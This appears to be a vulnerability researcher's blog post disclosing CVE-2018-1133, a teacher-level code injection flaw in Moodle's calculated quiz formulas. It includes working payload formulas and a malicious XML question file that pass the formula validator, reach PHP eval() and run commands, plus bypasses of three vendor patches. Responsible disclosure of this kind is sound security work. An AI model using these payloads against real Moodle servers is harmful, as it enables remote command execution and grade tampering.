Evil Teacher: Code Injection in Moodle

Robin Peraglie

Vulnerability Researcher


Moodle is a widely used open-source e-learning platform with more than 127 million users. It lets teachers and students manage course activities and exchange learning material digitally, and it is often deployed by large universities. In this post we examine the technical details of a critical vulnerability (CVE-2018-1133) that affects Moodle versions earlier than 3.5.0.

Impact - Who can exploit what?

To exploit the vulnerability, an attacker must hold the teacher role in a course on a Moodle instance earlier than 3.5.0 running with the default configuration. Escalating to this role through another vulnerability, such as XSS, is also possible. Given these requirements and knowledge of the vulnerability, the adversary can execute arbitrary commands on the operating system of the server running Moodle. A specially crafted math formula, which Moodle evaluates, bypasses the internal security mechanism that is meant to prevent the execution of malicious commands. In the following sections, we examine the technical details of the vulnerability.

Math formulas in Quiz component

Moodle allows teachers to set up a quiz with many types of questions. Among them is the calculated question, which lets a teacher enter a mathematical formula that Moodle evaluates dynamically on randomized input variables. This prevents students from cheating by simply sharing their results. For example, the teacher could type What is {x} added to {y}? with the answer formula {x}+{y}. Moodle would then generate two random numbers and insert them for the placeholders {x} and {y} in the question and answer text (say 3.9+2.1). Finally, it would compute the answer 6.0 by calling the security-sensitive PHP function eval() on the formula. eval() is well known for its malicious potential because it executes arbitrary PHP code.


question/type/calculated/questiontype.php

    public function substitute_variables_and_eval($str, $dataset) {
        // Substitutes {x} and {y} for numbers like 1.2 with str_replace():
        $formula = $this->substitute_variables($str, $dataset);
        if ($error = qtype_calculated_find_formula_errors($formula)) {
            return $error;   // formula security mechanism
        }
        $str = null;
        eval('$str = '.$formula.';');   // dangerous eval() call
        return $str;
    }
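
The substitute-then-evaluate flow can be sketched in Python as follows. This is a simplified model, not Moodle code: the helper names are hypothetical, and the sketch deliberately uses a tiny arithmetic-only evaluator instead of an eval()-style call, which is a choice made for this illustration and not what Moodle does.

```python
import ast
import operator

# Hypothetical helpers that model the flow; none of this is Moodle code.
_BINARY_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
}


def substitute_variables(text, dataset):
    """Replace each {name} placeholder with its dataset value."""
    for name, value in dataset.items():
        text = text.replace("{" + name + "}", str(value))
    return text


def evaluate_arithmetic(expression):
    """Evaluate numbers combined with + - * / and reject everything else."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BINARY_OPS:
            return _BINARY_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        raise ValueError("unsupported syntax in formula")
    return walk(ast.parse(expression, mode="eval"))


dataset = {"x": 3.9, "y": 2.1}
question = substitute_variables("What is {x} added to {y}?", dataset)
answer = evaluate_arithmetic(substitute_variables("{x}+{y}", dataset))
print(question)
print(answer)
```

Anything that is not plain arithmetic, such as a function call, makes evaluate_arithmetic() raise ValueError instead of running it.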

To enforce the usage of only harmless PHP code the developers of Moodle have introduced a validator function qtype_calculated_find_formula_errors() which is invoked before the dangerous eval() call with the intention of detecting illegal and malicious code in the formula provided by the teacher.


question/type/calculated/questiontype.php

1923    function qtype_calculated_find_formula_errors($formula) {
1924        // Returns false if everything is alright
1925        // otherwise it constructs an error message.
1926        // Strip away dataset names.
1927        while (preg_match('~\\{[[:alpha:]][^>} <{"\']*\\}~', $formula, $regs)){
1928            $formula = str_replace($regs[0], '1', $formula);
1929        }
1930
1931        // Strip away empty space and lowercase it.
1932        $formula = strtolower(str_replace(' ', '', $formula));
1933
1934        $safeoperatorchar = '-+/*%>:^\~<?=&|!'; /* */
1935        $operatorornumber = "[{$safeoperatorchar}.0-9eE]";
1936
1937        // [...]
1938
1939        if (preg_match("~[^{$safeoperatorchar}.0-9eE]+~", $formula, $regs)) {
1940            return get_string('illegalformulasyntax','qtype_calculated',$regs[0]);
1941        } else {
1942            // Formula just might be valid.
1943            return false;
1944        }
1945    }

Developing a Bypass

As the source code above shows, the last preg_match() call on line 1939 is very strict: it rejects the formula if any character other than -+/*%>:^\~<?=&|!.0-9eE is left in it. However, the while loop that starts on line 1927 first replaces every placeholder of the form {x} with 1, repeating until no placeholder is left. The corresponding regular expression barely restricts the character set of placeholder names: {system(ls)} is a valid placeholder and is also replaced by 1 on line 1928. This is a weakness, because it hides potentially malicious characters from the final preg_match() check, and the function then returns false, indicating a valid formula. Hiding malicious code this way and combining it with nested placeholders yields an exploitable vulnerability.
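
To make the weakness concrete, here is a minimal Python model of the validator. It is a sketch under stated assumptions: the two PHP patterns are translated by hand ([[:alpha:]] becomes [A-Za-z]), the part elided as [...] in the listing is left out, and the function name is hypothetical. Nothing is evaluated; the model only reports whether a formula would pass.

```python
import re

# Hand-translated versions of the two PHP patterns from the listing.
PLACEHOLDER = re.compile(r"""\{[A-Za-z][^>} <{"']*\}""")
ILLEGAL = re.compile(r"[^-+/*%>:^~<?=&|!.0-9eE]+")


def find_formula_errors(formula):
    """Return the first illegal fragment, or None if the formula passes.

    Simplified model: the part elided as [...] in the PHP listing is omitted.
    """
    # Keep replacing placeholders with "1" until none is left.
    while True:
        match = PLACEHOLDER.search(formula)
        if match is None:
            break
        formula = formula.replace(match.group(0), "1")
    # Strip spaces, lowercase, then look for characters outside the whitelist.
    formula = formula.replace(" ", "").lower()
    illegal = ILLEGAL.search(formula)
    return illegal.group(0) if illegal else None


for candidate in ["1+2", "system(ls)", "{system(ls)}", "{a{b}}"]:
    verdict = find_formula_errors(candidate)
    print(candidate, "->", "valid" if verdict is None else "illegal: " + verdict)
```

In this model the bare call is rejected, while the same text wrapped in curly brackets passes, and so does a nested placeholder, because the loop collapses it from the inside out.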

Nr.  Math formula              Validity  Argument of eval()                 Result of eval()
1    `$_GET[0]`                illegal
2    {a.`$_GET[0]`}            valid     $str = 1.2;                        eval success
3    {a.`$_GET[0]`;{x}}        valid     $str = {a.`$_GET[0]`;1.2};         PHP syntax error '{'
4    /*{a*/`$_GET[0]`;//{x}}   valid     $str = /*{a*/`$_GET[0]`;//1.2};    eval success

The validator qtype_calculated_find_formula_errors() rejects the first malicious formula. If we turn it into a placeholder by wrapping it in curly brackets, as in the second payload, the validator no longer detects the attack, but Moodle simply replaces the whole placeholder with a random number such as 1.2 before it reaches eval(). However, if we nest another placeholder inside the one we already have, Moodle substitutes only the inner placeholder, and the dangerous outer placeholder reaches eval(), as shown in the third row of the table. At this point the payload throws a PHP syntax error because the input of eval() is not valid PHP. We therefore only have to repair the syntax by hiding the invalid parts from the PHP parser inside PHP comments. The result is the final formula in row four, which allows code execution via the GET parameter 0.
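
The mismatch between validation and substitution can be reproduced with a short Python sketch that builds the string handed to eval() for rows 2 to 4 of the table, without ever running it. The function name is hypothetical, and the sketch assumes that dataset names are collected in a single non-recursive regex pass and that every placeholder receives the value 1.2.

```python
import re

# Hand-translated placeholder pattern; [[:alpha:]] becomes [A-Za-z].
PLACEHOLDER = re.compile(r"""\{([A-Za-z][^>} <{"']*)\}""")


def eval_argument(formula, value="1.2"):
    """Build the string that would be handed to eval(), without running it."""
    # Assumption: dataset names come from one non-recursive regex pass,
    # so only the innermost placeholder of a nested pair is found.
    for name in dict.fromkeys(PLACEHOLDER.findall(formula)):
        formula = formula.replace("{" + name + "}", value)
    return "$str = " + formula + ";"


rows = {
    2: "{a.`$_GET[0]`}",
    3: "{a.`$_GET[0]`;{x}}",
    4: "/*{a*/`$_GET[0]`;//{x}}",
}
for number, formula in rows.items():
    print(number, eval_argument(formula))
```

The validator loops until no placeholder is left, whereas the substitution makes only one pass. That difference is what lets the outer placeholder survive in rows 3 and 4.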

Adapting to insufficient patches

Moodle responded immediately to our report and proposed a patch to resolve the issue quickly. However, when we re-scanned the application with RIPS, our SAST solution, it still detected the same vulnerability, which pointed towards a bypass of the freshly introduced patch. After inspecting the associated source code and the scanner results more closely, we were able to bypass the patch and achieve the same impact as before. This was possible for the first three proposed patches, and we explain each bypass in the following subsections.

First patch: Blacklist

The first patch proposed by the Moodle developers was based on the idea of rejecting formulas that contain the PHP comments used in the exploit payload. As the code shows, the patch prepended a foreach loop that checks whether the formula contains specific strings.


question/type/calculated/questiontype.php

    function qtype_calculated_find_formula_errors($formula) {
        foreach (['//', '/*', '#'] as $commentstart) {
            if (strpos($formula, $commentstart) !== false) {
                return get_string('illegalformulasyntax',
                    'qtype_calculated',
                    $commentstart);
            }
        }

This patch renders our current payload useless, because the validator function qtype_calculated_find_formula_errors() now detects the strings that start PHP comments (//, /* and #), which our payload relies on. The patch implemented a blacklist approach and rested on the assumption that no attacker could turn the invalid PHP syntax from row 3 of the table above into valid PHP without using comments. However, the patch was insufficient and allowed exploitation with a more sophisticated version of the payload.

Math formula                           Argument of eval
1?><?=log(1){a.`$_GET[0]`.({x})}?>     $str = 1?><?=log(1){a.`$_GET[0]`.({x})}?>;
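
A small Python model of the blacklist check shows why it stops the earlier payload but not this one. The function name is hypothetical and the sketch covers only the prepended comment check, not the rest of the validator.

```python
# The three comment starters checked by the first patch.
COMMENT_STARTS = ["//", "/*", "#"]


def first_comment_marker(formula):
    """Return the first blacklisted comment starter found, or None."""
    for marker in COMMENT_STARTS:
        if marker in formula:
            return marker
    return None


row_four = "/*{a*/`$_GET[0]`;//{x}}"                # payload from the first table
comment_free = "1?><?=log(1){a.`$_GET[0]`.({x})}?>"  # formula from the table above

print(first_comment_marker(row_four))
print(first_comment_marker(comment_free))
```

The second formula contains none of the three markers, so a check that looks only for comment starters has nothing to object to.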

Second patch: Deny nested placeholders

The idea of the second patch was to prevent the nested placeholders used in our payload by removing the “recursion” when detecting placeholders. Again, re-scanning the application with RIPS still reported the same vulnerability, which led us to look more closely at the following new lines of code.


question/type/calculated/questiontype.php

    public function find_dataset_names($text) {
        // Returns the possible dataset names found in the text as an array.
        // The array has the dataset name for both key and value.
        if (preg_match_all('~\\{([[:alpha:]][^>} <{"\']*)\\}~',$text,$regs)) {
            $datasetnames = array_unique($regs[1]);
            return array_combine($datasetnames, $datasetnames);
        } else {
            return [];
        }
    }
    [...]
    function qtype_calculated_find_formula_errors($formula) {
        $datasetnames = find_dataset_names($formula);
        foreach ($datasetnames as $datasetname) {
            $formula = str_replace('{'.$datasetname.'}', '1', $formula);
        }

Whenever we input a nested placeholder {a{b}}, the function qtype_calculated_find_formula_errors() now replaces only {b} as a placeholder, and the leftover formula {a1} is detected as illegal. However, if we alter our formula to {b}{a1}{a{b}}, exactly two placeholders, {b} and {a1}, are detected and returned by find_dataset_names(). The foreach loop replaces them one after another, beginning with {b}, which leaves the formula 1{a1}{a1}. After {a1} is replaced as well, the formula equals 111, so the validator approves the nested placeholder and the intention of the patch is defeated. With this trick in mind, we only had to adapt our last payload to get the same critical effect as before:

formula         /*{x}{a*/`$_GET[0]`/*(1)//}{a*/`$_GET[0]`/*({x})//}*/
input of eval   $str = /*{x}{a*/`$_GET[0]`/*(1)//}{a*/`$_GET[0]`/*({x})//}*/;
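
The {b}{a1}{a{b}} walk-through can be replayed with a short Python model of the patched logic. This is a sketch: the pattern is translated by hand ([[:alpha:]] becomes [A-Za-z]), strip_placeholders() is a hypothetical name for the foreach loop, and the remaining validator checks are omitted.

```python
import re

# Hand-translated version of the pattern used by find_dataset_names().
PLACEHOLDER = re.compile(r"""\{([A-Za-z][^>} <{"']*)\}""")


def find_dataset_names(text):
    """Collect placeholder names in one pass, keeping first-seen order."""
    return list(dict.fromkeys(PLACEHOLDER.findall(text)))


def strip_placeholders(formula):
    """Replace each name found up front with 1, one after another."""
    for name in find_dataset_names(formula):
        formula = formula.replace("{" + name + "}", "1")
    return formula


print(find_dataset_names("{b}{a1}{a{b}}"))
print(strip_placeholders("{a{b}}"))
print(strip_placeholders("{b}{a1}{a{b}}"))
```

The names are collected before any replacement happens, but replacing {b} creates a new {a1} that is already in the list, so the nested placeholder is removed after all.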

Third patch: Blacklist and Linear Replacement

The third patch combined the first two approaches and looked solid at preventing nested placeholders. However, if an attacker targeted the import feature of the Quiz component and imported a maliciously crafted XML question file, the attacker was able to control the $dataset argument of substitute_variables() (see above) and nullify the placeholder substitution.


Abstract malicious XML file

1942    <quiz>
1943        <question type="calculated">
1944            [...]
1945            <answer fraction="100">
1946                <text>log(1){system($_GET[0])}</text>
1947            </answer>
1948        </question>
1949        <dataset_definitions>
1950            <dataset_definition>
1951                <name><text>x</text></name>
1952            </dataset_definition>
1953        </dataset_definitions>
1954    </quiz>

The XML file defines the placeholder name x on line 1951, but this placeholder is never used in the formula on line 1946. As a result, our dangerous placeholder {system($_GET[0])} is not substituted, which leads to the same code injection vulnerability as with the previous patches.
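
The mismatch between defined and used placeholders can be made visible with a small consistency check. The following Python sketch parses the abstract XML from above (with the elided [...] part left out) and reports placeholders that appear in an answer formula but have no dataset definition. The function name is hypothetical and this is only an illustration, not the check Moodle introduced.

```python
import re
import xml.etree.ElementTree as ET

# Hand-translated placeholder pattern; [[:alpha:]] becomes [A-Za-z].
PLACEHOLDER = re.compile(r"""\{([A-Za-z][^>} <{"']*)\}""")

# The abstract XML from the post, without the elided part.
ABSTRACT_XML = """
<quiz>
    <question type="calculated">
        <answer fraction="100">
            <text>log(1){system($_GET[0])}</text>
        </answer>
    </question>
    <dataset_definitions>
        <dataset_definition>
            <name><text>x</text></name>
        </dataset_definition>
    </dataset_definitions>
</quiz>
"""


def undefined_placeholders(xml_text):
    """Return placeholder names used in answers but missing from the datasets."""
    root = ET.fromstring(xml_text)
    defined = {node.text for node in root.findall(".//dataset_definition/name/text")}
    formulas = [node.text for node in root.findall(".//answer/text")]
    used = {name for formula in formulas for name in PLACEHOLDER.findall(formula)}
    return used - defined


print(undefined_placeholders(ABSTRACT_XML))
```

A non-empty result means the formula contains a placeholder that the substitution step would never touch.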

Fourth patch

Unfortunately, we were not able to fully verify the completeness of the fourth patch due to time restrictions. We are going to update this blog post if this changes and of course notify the developers beforehand.

Timetable

Date        Event
01/May/18   First contact with vendor
01/May/18   Insufficient patch #1 proposed
02/May/18   Bypass #1 reported and acknowledged
07/May/18   Insufficient patch #2 proposed
08/May/18   Bypass #2 reported and acknowledged
12/May/18   Insufficient patch #3 proposed
15/May/18   Bypass #3 reported and acknowledged
16/May/18   Patch #4 proposed
17/May/18   Fix released

Summary

In this post, we looked at a critical vulnerability in Moodle. Moodle is often integrated into larger systems that join a webmailer, e-learning platforms and further technologies into a single architecture with shared account credentials. This opens a large attack surface for unauthenticated attackers to phish or extract the credentials of a teacher account. In some cases an automated service for requesting a Moodle course exists, which puts a student directly into a position to execute malicious software of their choice and give themselves long-term top grades in their university courses.


With the help of automated security analysis, not only the vulnerability itself but also the insufficient patches were reported within 10 minutes, which can save many hours of rework. We would like to thank the Moodle team for their very fast response and collaboration on patching the issue. We highly recommend updating your instances to the newest version immediately.
